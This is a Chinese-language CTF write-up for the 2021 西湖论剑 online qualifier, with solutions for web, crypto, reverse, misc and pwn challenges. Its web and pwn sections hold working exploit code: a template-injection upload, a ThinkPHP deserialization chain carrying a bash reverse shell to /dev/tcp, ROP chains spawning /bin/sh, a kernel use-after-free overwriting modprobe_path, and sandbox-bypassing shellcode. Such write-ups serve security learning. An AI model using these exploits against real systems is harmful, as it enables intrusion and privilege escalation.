2021 西湖论剑 线上初赛 WP

2021 西湖论剑 线上初赛 WP

web

web2

import requests

def test(payload):
    url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"
    files = {'file': ("index.latte",payload)}
    resp = requests.post(url, files=files
                        #,proxies = {"http": "127.0.0.1:8080"}
                        )
    print(resp.text)
    resp = requests.get(url)
    print(resp.text)

payload = """{=system//
($_POST["cmd"])}"""

test(payload)

data = {
    "cmd":"cat /flag"
}


url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"

r = requests.post(url,data=data)

print(r.text)

web3


web4

////绕过parse_url

<?php 

namespace League\Flysystem\Cached\Storage {
    abstract class AbstractCache {
        protected $autosave = false;
        protected $complete = "`bash -c 'exec bash -i &>/dev/tcp/ip/3333 <&1'`";
        // protected $complete = "\"&whoami&" ;
        // 在Windows环境中反引号无效,用&替代
    }
}

namespace think\filesystem {
    use League\Flysystem\Cached\Storage\AbstractCache;
    class CacheStore extends AbstractCache {
        protected $key = "1";
        protected $store;
        public function __construct($store="") {
            $this->store = $store;
        }
    }
}

namespace think\cache {
    abstract class Driver {
        protected $options = ["serialize"=>["system"],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"];
    }
}

namespace think\cache\driver {
    use think\cache\Driver;
    class File extends Driver{}
}

namespace {
    $file = new think\cache\driver\File();
    $cache = new think\filesystem\CacheStore($file);
    echo urlencode(serialize($cache));
}
?>

反弹shell即可

cry

hardrsa

from gmpy2 import *
from Crypto.Util.number import getPrime, long_to_bytes

import sympy

e = 0x10001
g = 2
y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473

c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059

pd = 24869782389865450501811571588222344463610376331618976983194310327543361050399067805113576647152708173449058210620622984193023800730206452772983672334055867000

x = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740

p = 12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741
print(long_to_bytes(pow(c,dp,p)))

数独

re

ROR

输入40个字节,然后加密后比较。
八个字节一组加密,直接z3或者angr都能出。。。。。

虚假的粉丝。

输入三个参数,一个是文件的序号,读取的起始位置和读取字节数。


然后11个字节,开头A结尾R,就脑洞猜key(无语) Alan Walker
最后猜出正确变体:Al4N_wAlK3R
解密得到字符画flag

misc

misc3_yusa的小秘密

bytectf原题,直接那之前的处理图片,处理后的图片上有flag。

from cv2 import cv2 as cv
img = cv.imread('ps')
src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)
Y, Cr, Cb = cv.split(src)
cv.imwrite('Y.png', (Y % 2) * 255)
cv.imwrite('Cr.png', (Cr % 2) * 255)
cv.imwrite('Cb.png', (Cb % 2) * 255)

misc5_Yusa的秘密

volatility分析 首先在桌面文件中发现了sakura相关的文件 同时发现用户名为yusa 于是以sakura和yusa为关键词dump可能有用的文件 最后找到了许多 其中关键的有mystery man.contact , yusa-didi ,key.zip
mystery man.contact中有一段base32,解码获得一段base64,再解码获得一个key,这个key用来解开yusa-didi这个压缩包,里面是一张key.bmp。然后根据题目给的原附件的who i am想到了用户密码 ,使用mimikatz插件获得YusaYusa520。然后根据yusa.contact中备忘录的提示dump下来stickynote进程 在其中发现了rtf模板保存下来获得key.zip的密码 key.zip解压后是一个脚本 读取key.bmp里的像素作为异或key加密flag 成了who i am 写一个解密脚本解密发现是张GIF图 最后分解GIF图在其中一帧上找到flag

pwn

pwn1_string_go

在lative_fuc中存在两个漏洞,第一个是输入的size可以是负数,导致可以直接向上溢出,从而泄漏canary和libc地址。其二是memcpy存在栈溢出,rop执行system(“/bin/sh”)

from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
local = 1
if local == 1:
    p = process('./string_go')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    syscall = 0
    gadgets = []
else:
    p = remote('82.157.20.104', 56700)
    lb = ELF('libc-2.27.so')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    gadgets = []
    syscall = 0


def new(off, x1, x2):
    p.sendlineafter('>>> ', '3')
    p.sendlineafter('>>> ', str(off))
    p.sendlineafter('>>> ', x1)
    p.sendlineafter('>>> ', x2)

new(-8, 'a'*0xf, '\xf0')
p.recvn(0x20)
libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = libc_addr-0x98e200
p.recvn(18)
canary = u64(p.recvn(8))
print('canary = ', hex(canary))
print('libc:', hex(libc))

p.recvuntil('>>> ')
ret_addr = libc + 0xc0c9d
rdi = libc + 0x215bf

payload = 'a'*0x18 + p64(canary) + 'a'*0x18 + p64(ret_addr) + p64(rdi)
payload += p64(libc + lb.search('/bin/sh\x00').next()) + \
    p64(libc + lb.sym['system'])
p.sendline(payload)

p.interactive()

pwn2_blind

这题是栈溢出,因为got表可写且没开pie,直接利用csu布置参数修改alarm低字节到syscall指令(需要爆破)。然后通过syscall执行exec(‘/bin/sh”,0,0’);

from signal import alarm
from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
local = 0
elf = ELF("./blind")
if local == 1:
    # p = process('./blind')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    syscall = 0
    gadgets = []
else:
    p = remote('82.157.6.165', 51000)
    # lb = ELF('libc.so')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    gadgets = []
    syscall = 0
if local == 1:
    p = gdb.debug('./blind', 'b *0x40074C')


exid = 0x3b
ap = 0x400560
ag = elf.got['alarm']
rg = elf.got['read']
bss = elf.bss()


def csu(func_got, arg0, arg1, arg2):
    csu1 = 0x4007B6
    csu2 = 0x4007A0
    re = p64(csu1+4)+p64(0)+p64(1)+p64(func_got) + \
        p64(arg0)+p64(arg1)+p64(arg2)+p64(csu2)
    return re


pay = b'a'*0x58
pay += csu(rg, 1, ag, 0)
pay += p64(0)*7
pay += csu(rg, 0x100, bss, 0)
pay += p64(0)*7
pay += csu(ag, 0, 0, bss)

p.send(pay.ljust(0x500, b'\x01'))

# pause()
p.send(p8(0xd5))

# pause()
p.send(b'/bin/sh'.ljust(exid, b'\x00'))
# p.sendline('cat flag')
# ss=p.recv()
p.interactive()

pwn3_easykernel

show中存在溢出读,通过读写堆上的残留内容获得kernel地址绕过kalsr。其堆的释放没有清空指针,导致存在uaf,参考其保护机制

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
                 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    /*
     * When CONFIG_KASAN_SW_TAGS is enabled, ptr_addr might be tagged.
     * Normally, this doesn't cause any issues, as both set_freepointer()
     * and get_freepointer() are called with a pointer with the same tag.
     * However, there are some issues with CONFIG_SLUB_DEBUG code. For
     * example, when __free_slub() iterates over objects in a cache, it
     * passes untagged pointers to check_object(). check_object() in turns
     * calls get_freepointer() with an untagged pointer, which causes the
     * freepointer to be restored incorrectly.
     */
    return (void *)((unsigned long)ptr ^ s->random ^
            swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
    return ptr;
#endif
}

修改fd指针,指向modprobe_path实现提权。

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
/*
 * HEX: show number in hex
 * LOG: show msg in specific format
 * show: show n(size*8==0) bytes at addr with hex format
 */
#define HEX(x) printf("[*]0x%016lx\n", (size_t)x)
#define LOG(addr) printf("[*]%s\n", addr)
void show(u_int64_t *addr, int size)
{
    int i;
    puts("--------------------------------------------");
    for (i = 0; i < size / 2; i++)
    {
        printf("0x%04lx ", (size_t)i * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[2 * i], (size_t)addr[2 * i + 1]);
    }
    if (size & 1)
    {
        printf("0x%04lx ", (size_t)i * 0x10);
        printf("0x%016lx 0x%016lx\n", (size_t)addr[size - 1], 0ul);
    }
    puts("--------------------------------------------");
}

int fd;

struct node
{
    /* data */
    u_int32_t idx;
    u_int64_t size;
    void *data;
};

void sw(int idx, size_t size, void *data)
{
    struct node t =
        {
            idx,
            size,
            data};
    ioctl(fd, 0x40, &t);
}

void edit(int idx, int size, void *data)
{
    struct node t =
        {
            idx,
            size,
            data};
    ioctl(fd, 0x50, &t);
}
void dlt(int idx)
{
    struct node t = {idx, 0, 0};
    ioctl(fd, 0x30, &t);
}

void new (int size, void *data)
{
    struct node t = {0, size, data};
    ioctl(fd, 0x20, &t.size);
}

#define __u64 u_int64_t
#define swab64(x) ((__u64)((((__u64)(x) & (__u64)0x00000000000000ffULL) << 56) | \
                           (((__u64)(x) & (__u64)0x000000000000ff00ULL) << 40) | \
                           (((__u64)(x) & (__u64)0x0000000000ff0000ULL) << 24) | \
                           (((__u64)(x) & (__u64)0x00000000ff000000ULL) << 8) |  \
                           (((__u64)(x) & (__u64)0x000000ff00000000ULL) >> 8) |  \
                           (((__u64)(x) & (__u64)0x0000ff0000000000ULL) >> 24) | \
                           (((__u64)(x) & (__u64)0x00ff000000000000ULL) >> 40) | \
                           (((__u64)(x) & (__u64)0xff00000000000000ULL) >> 56)))

int main(int argc, char const *argv[])
{
    fd = open("/dev/kerpwn", O_RDWR);
    if (fd == -1)
    {
        perror("[-]dev open:");
        exit(-1);
    }
    LOG("open success!");
    void *buf = malloc(0x10000);
    memset(buf, 'A', 0x1000);

    LOG("leak the kalsr");
    new (0x10, buf);
    memset(buf, 0, 0x200);
    sw(0, 0x100, buf);
    show(buf, (0x100) / 8);

    size_t *p = buf;
    size_t kbase = 0;
    for (int i = 0; i < 0x10; i++)
    {
        if ((p[i] >> 32) == 0xffffffffLL)
        {
            kbase = p[i] - 0x10f1fa0;
            break;
        }
    }

    // size_t kbase=*(size_t *)(buf+0x40);
    LOG("kernel base:");
    HEX(kbase);

    //use uaf to change modprobe path
    LOG("change modprobe path!");
    getchar();
    size_t mp = kbase + 0x1663c00;
    LOG("modprobe path");
    HEX(mp);

    int i, j;
    uint64_t xored_cookie = 0, heap_addr[26], temp, secret;
    char record[0x100];
    for (i = 0; i < 25; i++)
        add(0x10, "abcd"); //1-25
    for (i = 1; i <= 25; i++)
        dlt(i);
    for (i = 1; i <= 25; i++)
    {

        sw(i, 0x100, buf);
        for (j = 0; j < 0x100; j += 8)
        {
            if (((*(uint64_t *)&buf[j]) & 0xffff) == 0xb8af)
                xored_cookie = *(uint64_t *)&buf[j];
        }
    }
    if (xored_cookie)
        printf("success:%llx\n", xored_cookie);

    sw(2, 16, buf);
    heap_addr[1] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap1 addr:0x%llx\n", heap_addr[1]);
    temp = *(uint64_t *)&buf[8];

    sw(3, 16, buf);
    heap_addr[2] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap2 addr:0x%llx\n", heap_addr[2]);

    secret = heap_addr[1] ^ swab64(heap_addr[2]) ^ temp;
    printf("secret:0x%llx\n", secret);

    sw(25, 16, buf);
    heap_addr[24] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
    printf("heap24 addr:0x%llx\n", heap_addr[24]);

    sw(24, 8, buf);
    *(uint64_t *)&buf[8] = mp ^ swab64(heap_addr[24]) ^ secret;
    printf("attempt:%llx\n", *(uint64_t *)&buf[8]);
    edit(24, 16, buf);

    add(0x10,"abcd");
    add(0x10,"abcd");
    add(0x10,"/tmp/c");

    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/c");
    system("chmod +x /tmp/c");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
    system("chmod +x /tmp/dummy");

    system("/tmp/dummy");
    system("cat /tmp/flag");
    return 0;
}

pwn4_code_project

程序开始将flag写入随机地址,并且开启沙箱经用常用的读写和命令执行的系统调用。但是并未为禁用writev系统调用仍然可以通过它进行系统调用,而且程序只允许用可见自负进行shellcode进行编码。这里直接利用alpha3工具进行编码。

'''
    xor r7, r7
    loop:
    mov r4, r7
    sal r4, 12
    push 0x14
    pop rax
    push 1
    pop rdi
    push 1
    pop rdx
    push 0x30
    push r4
    mov rsi, rsp
    syscall
    inc r7
    jmp loop

'''
from pwn import *
import inspect
from sys import argv

def leak(var):
    callers_local_vars = inspect.currentframe().f_back.f_locals.items()
    temp =  [var_name for var_name, var_val in callers_local_vars if var_val is var][0]
    p.info(temp + ': {:#x}'.format(var))

local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
local_libc_32 = '/lib/i386-linux-gnu/libc.so.6'
remote_libc = ''
binary = './code_project'
context.binary = binary
elf = ELF(binary,checksec=False)

p = process(binary)
if len(argv) > 1:
    if argv[1]=='r':
        p = remote('82.157.31.181',42400)
libc = elf.libc

comm = ''
comm+= 'b *0x400b16\n'

shellcode =shellcraft.open("flag")
shellcode+= shellcraft.read(3,0x601240,0x30)
shellcode+= shellcraft.write(1,0x601240,0x30)
print(shellcode)


shellcode = b'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M10108O1L4y3V16404j082s2G2n1k070k0Z05000Z180s2E0z8N3D0a042B8O403K4I2Z0Z'

p.sendlineafter(b'Hints: DASCTF{MD5}',shellcode)

p.interactive()


暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇